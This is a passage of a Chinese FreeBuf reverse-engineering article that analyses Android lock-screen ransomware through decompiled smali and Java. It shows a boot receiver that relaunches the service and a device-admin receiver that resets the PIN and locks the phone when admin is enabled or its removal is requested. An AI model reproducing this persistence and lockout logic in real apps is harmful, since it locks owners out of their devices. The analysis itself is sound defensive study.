00000280 new-instance v15, StringBuffer
00000284 move-object/from16 v19, v15
00000288 move-object/from16 v15, v19
0000028C move-object/from16 v16, v19
00000290 invoke-direct/range StringBuffer-><init>()V, v16 .. v16 # stringbuffer3 = new StringBuffer()
00000296 move-object/from16 v16, v1
0000029A move-object/from16 v0, v16
0000029E iget-object v0, v0, s->Lycorisradiata:String
000002A2 move-object/from16 v16, v0
000002A6 invoke-virtual/range StringBuffer->append(String)StringBuffer, v15 .. v16 # stringbuffer3.append(this.Lycorisradiata)
000002AC move-result-object v15
000002AE const-string v16, "ebbcd47d6afa253eba111409c5ebe0a3751098207629ac6dcf5ffadff17f0330e3ed51aa320a6b30a613feffaf16a7bf"
000002B2 invoke-virtual/range StringBuffer->append(String)StringBuffer, v15 .. v16 # stringbuffer3.append(v16)
000002B8 move-result-object v15
000002BA invoke-virtual StringBuffer->toString()String, v15
000002C0 move-result-object v15
000002C2 move-object v6, v15
000002C4 move-object v15, v4
000002C6 invoke-static DU->getbah(String)String, v15
000002CC move-result-object v15
000002CE move-object v7, v15
000002D0 move-object v15, v5
000002D2 invoke-static DU->getbah(String)String, v15
000002D8 move-result-object v15
000002DA move-object v8, v15
000002DC move-object v15, v6
000002DE invoke-static DU->getbah(String)String, v15
000002E4 move-result-object v15
000002E6 move-object v9, v15
000002E8 move-object v15, v1
000002EA iget-object v15, v15, s->wb:TextView
000002EE move-object/from16 v16, v1
000002F2 move-object/from16 v0, v16
000002F6 iget-object v0, v0, s->des:DU
000002FA move-object/from16 v16, v0
000002FE move-object/from16 v17, v7
00000302 invoke-virtual/range DU->decrypt(String)String, v16 .. v17
00000308 move-result-object v16
0000030A invoke-virtual/range TextView->append(CharSequence)V, v15 .. v16 # s.wb.append(s.des.decrypt(DU.getbah(v4)))
00000310 move-object v15, v1
00000312 iget-object v15, v15, s->bah:TextView
00000316 move-object/from16 v16, v1
0000031A move-object/from16 v0, v16
0000031E iget-object v0, v0, s->des:DU
00000322 move-object/from16 v16, v0
00000326 move-object/from16 v17, v8
0000032A invoke-virtual/range DU->decrypt(String)String, v16 .. v17
00000330 move-result-object v16
00000332 invoke-virtual/range TextView->append(CharSequence)V, v15 .. v16 # s.wb.append(s.des.decrypt(DU.getbah(v5)))
00000338 move-object v15, v1
0000033A invoke-virtual s->getResources()Resources, v15
00000340 move-result-object v15
00000342 const/high16 v16, 0x7F060000
00000346 invoke-virtual/range Resources->openRawResource(I)InputStream, v15 .. v16
0000034C move-result-object v15
0000034E move-object v10, v15
00000350 move-object v15, v10
00000352 invoke-static BAH->getString(InputStream)String, v15 # string = BAH.getString(s.getResources().openRawResource(0x7F060000))
00000358 move-result-object v15
0000035A move-object v11, v15
0000035C move-object v15, v11
0000035E const-string v16, "\n"
00000362 const-string v17, ""
00000366 invoke-virtual/range String->replaceAll(String, String)String, v15 .. v17 # string.replaceAll("\n", "")
0000036C move-result-object v15
0000036E move-object v12, v15
00000370 move-object v15, v12
00000372 invoke-static DU->getsss(String)String, v15
00000378 move-result-object v15
0000037A move-object v13, v15
0000037C move-object v15, v1
0000037E iget-object v15, v15, s->cjk:TextView
00000382 move-object/from16 v16, v13
00000386 invoke-virtual/range TextView->append(CharSequence)V, v15 .. v16 # s.cjk.append(DU.getsss(string))
0000038C move-object v15, v1
0000038E iget-object v15, v15, s->tv:TextView
00000392 move-object/from16 v16, v1
00000396 move-object/from16 v0, v16
0000039A iget-object v0, v0, s->des:DU
0000039E move-object/from16 v16, v0
000003A2 move-object/from16 v17, v9
000003A6 invoke-virtual/range DU->decrypt(String)String, v16 .. v17
000003AC move-result-object v16
000003AE invoke-virtual/range TextView->append(CharSequence)V, v15 .. v16
:3B4
000003B4 return-void
:3B6
000003B6 move-exception v15
000003B8 move-object v4, v15
000003BA goto :3B4
.catch Exception {:1F8 .. :3B4} :3B6
.end method
s服务小结:主要提供解锁服务和一些布局界面的设置。
2) 开机完成的广播接收器bbb。
<receiver android:name="bbb">
<intent-filter android:priority="2147483647">
<action android:name="android.intent.action.BOOT_COMPLETED" />
</intent-filter>
</receiver>
很明显,由下面的分析可以知道这是一个开机启动s服务的广播。
.method public onReceive(Context, Intent)V
.registers 18
.annotation system Signature
value = {
"(",
"Landroid/content/Context;",
"Landroid/content/Intent;",
")V"
}
.end annotation
.annotation runtime Override
.end annotation
00000000 move-object v0, p0
00000002 move-object/from16 v1, p1
00000006 move-object/from16 v2, p2 # mIntent
0000000A move-object v7, v2
0000000C invoke-virtual Intent->getAction()String, v7
00000012 move-result-object v7
00000014 const-string v8, "android.intent.action.BOOT_COMPLETED"
00000018 invoke-virtual String->equals(Object)Z, v7, v8 # mIntent.getAction.equals("android.intent.action.BOOT_COMPLETED")
0000001E move-result v7
00000020 if-eqz v7, :66
:24
00000024 move-object v7, v0
00000026 invoke-virtual bbb->abortBroadcast()V, v7 # this.abortBroadcast()
0000002C new-instance v7, Intent
00000030 move-object v14, v7
00000032 move-object v7, v14
00000034 move-object v8, v14
00000036 move-object v9, v1
:38
00000038 const-string v10, "com.cjk.s"
0000003C invoke-static Class->forName(String)Class, v10 # class.forName("com.cjk.s")
:42
00000042 move-result-object v10
00000044 invoke-direct Intent-><init>(Context, Class)V, v8, v9, v10 # intent2 = new Intent(context, class.forName("com.cjk.s"))
0000004A move-object v4, v7
0000004C move-object v7, v4
0000004E const/high16 v8, 0x10000000
00000052 invoke-virtual Intent->addFlags(I)Intent, v7, v8 # intent2.addFlags(0x10000000)
00000058 move-result-object v7
0000005A move-object v7, v1
0000005C move-object v8, v4
0000005E invoke-virtual Context->startService(Intent)ComponentName, v7, v8 # startService(intent2)
00000064 move-result-object v7
:66
00000066 return-void
3)设备管理员激活时的广播接收器。
<receiver android:description="@string/hello" android:name=".MyAdmin">
<meta-data android:name="android.app.device_admin" android:resource="@xml/my_admin" />
<intent-filter>
<action android:name="android.app.action.DEVICE_ADMIN_ENABLED" />
</intent-filter>
</receiver>
一旦用户点击确认激活设备管理器,首先执行onEnabled方法,重置锁屏密码,然后触发密码更改后调用的方法onPasswordChanged,进行了锁屏行为,并且在用户想要解除该设备管理员身份的时候也会进行锁屏行为。
.method public onEnabled(Context, Intent)V
.registers 22
.annotation system Signature
value = {
"(",
"Landroid/content/Context;",
"Landroid/content/Intent;",
")V"
}
.end annotation
.annotation runtime Override
.end annotation
00000000 move-object/from16 v0, p0
00000004 move-object/from16 v1, p1
00000008 move-object/from16 v2, p2
0000000C move-object v11, v1
0000000E invoke-virtual Context->getResources()Resources, v11
00000014 move-result-object v11
00000016 const v12, 0x7F060002
0000001C invoke-virtual Resources->openRawResource(I)InputStream, v11, v12
00000022 move-result-object v11
00000024 move-object v4, v11
00000026 move-object v11, v4
00000028 invoke-static BAH->getString(InputStream)String, v11 # BAH.getString(context.getResources().openRawResource(0x7f060002))
0000002E move-result-object v11
00000030 move-object v5, v11
00000032 move-object v11, v5
00000034 const-string v12, "\n"
00000038 const-string v13, ""
0000003C invoke-virtual String->replaceAll(String, String)String, v11, v12, v13
00000042 move-result-object v11
00000044 move-object v6, v11
00000046 move-object v11, v6
00000048 invoke-static DU->getsss(String)String, v11 # passwd = DU.getsss(BAH.getString(context.getResources().openRawResource(0x7f060002)).replace("\n", ""))
0000004E move-result-object v11
00000050 move-object v7, v11
00000052 new-instance v11, Intent
00000056 move-object/from16 v18, v11
0000005A move-object/from16 v11, v18
0000005E move-object/from16 v12, v18
00000062 move-object v13, v1
:64
00000064 const-string v14, "com.cjk.s"
00000068 invoke-static Class->forName(String)Class, v14
:6E
0000006E move-result-object v14
00000070 invoke-direct Intent-><init>(Context, Class)V, v12, v13, v14 # intent = new Intent(Class.forName("com.cjk.s"))
00000076 move-object v8, v11
00000078 move-object v11, v8
0000007A const/high16 v12, 0x10000000
0000007E invoke-virtual Intent->setFlags(I)Intent, v11, v12
00000084 move-result-object v11
00000086 move-object v11, v1
00000088 move-object v12, v8
0000008A invoke-virtual Context->startService(Intent)ComponentName, v11, v12 # startService(intent)
00000090 move-result-object v11
00000092 move-object v11, v0
00000094 move-object v12, v1
00000096 invoke-virtual MyAdmin->getManager(Context)DevicePolicyManager, v11, v12 # this.getManager(context)
0000009C move-result-object v11
0000009E move-object v12, v7
000000A0 const/4 v13, 0
000000A2 invoke-virtual DevicePolicyManager->resetPassword(String, I)Z, v11, v12, v13 # this.getManager(context).resetPassword(passwd, 0)
000000A8 move-result v11
000000AA move-object v11, v0
000000AC move-object v12, v1
000000AE move-object v13, v2
000000B0 invoke-super DeviceAdminReceiver->onEnabled(Context, Intent)V, v11, v12, v13
000000B6 return-void
代码大致相同,不再赘述。
@Override public void onPasswordChanged(Context arg13, Intent arg14) {
String v7 = DU.getsss(BAH.getString(arg13.getResources().openRawResource(0x7F060002)).replaceAll("\n", ""));
this.getManager(arg13).lockNow();
this.getManager(arg13).resetPassword(v7, 0);
super.onPasswordChanged(arg13, arg14);
}
@Override public CharSequence onDisableRequested(Context arg13, Intent arg14) {
String v7 = DU.getsss(BAH.getString(arg13.getResources().openRawResource(0x7F060002)).replaceAll("\n", ""));
this.getManager(arg13).lockNow();
this.getManager(arg13).resetPassword(v7, 0);
return super.onDisableRequested(arg13, arg14);
}
4) 启动Activity主要在oncreate方法中,调用了开启激活设备管理员的界面。
.method private activiteDevice()V
.registers 15
.annotation system Signature
value = {
"()V"
}
.end annotation
00000000 move-object v0, p0
00000002 new-instance v6, Intent
00000006 move-object v13, v6
00000008 move-object v6, v13
0000000A move-object v7, v13
0000000C const-string v8, "android.app.action.ADD_DEVICE_ADMIN"
00000010 invoke-direct Intent-><init>(String)V, v7, v8 # intent = new Intent("android.app.action.ADD_DEVICE_ADMIN")
00000016 move-object v2, v6
00000018 new-instance v6, ComponentName
0000001C move-object v13, v6
0000001E move-object v6, v13
00000020 move-object v7, v13
00000022 move-object v8, v0
:24
00000024 const-string v9, "com.cjk.MyAdmin"
00000028 invoke-static Class->forName(String)Class, v9 # Class.forName("com.cjk.MyAdmin")
:2E
0000002E move-result-object v9
00000030 invoke-direct ComponentName-><init>(Context, Class)V, v7, v8, v9 # mConponent = new ComponentName(this, Class.forName("com.cjk.MyAdmin"))
00000036 move-object v3, v6
00000038 move-object v6, v2
0000003A const-string v7, "android.app.extra.DEVICE_ADMIN"
0000003E move-object v8, v3
00000040 invoke-virtual Intent->putExtra(String, Parcelable)Intent, v6, v7, v8 # intent.putExtra("android.app.extra.DEVICE_ADMIN", mConponent)
00000046 move-result-object v6
00000048 move-object v6, v0
0000004A move-object v7, v2
0000004C const/4 v8, 0
0000004E invoke-virtual M->startActivityForResult(Intent, I)V, v6, v7, v8 # startActivityForResult(intent, 0)
总结
至此,基本全部分析完毕,主要在这个分析的过程中来了解smali语法,当编译成java的语法出错时可以看汇编代码,当然也可以尝试进行一些软件破解行为。
参考
google官方smali语法 https://source.android.com/devices/tech/dalvik/dalvik-bytecode
Dalvik opcodes http://pallergabor.uw.hu/androidblog/dalvik_opcodes.html
深入理解Dalvik字节码指令及Smali文件 https://blog.csdn.net/dd864140130/article/details/52076515
*本文作者:xiongchaochao,转载请注明来自FreeBuf.COM
来源:freebuf.com 2019-04-08 10:00:10 by: xiongchaochao
请登录后发表评论
注册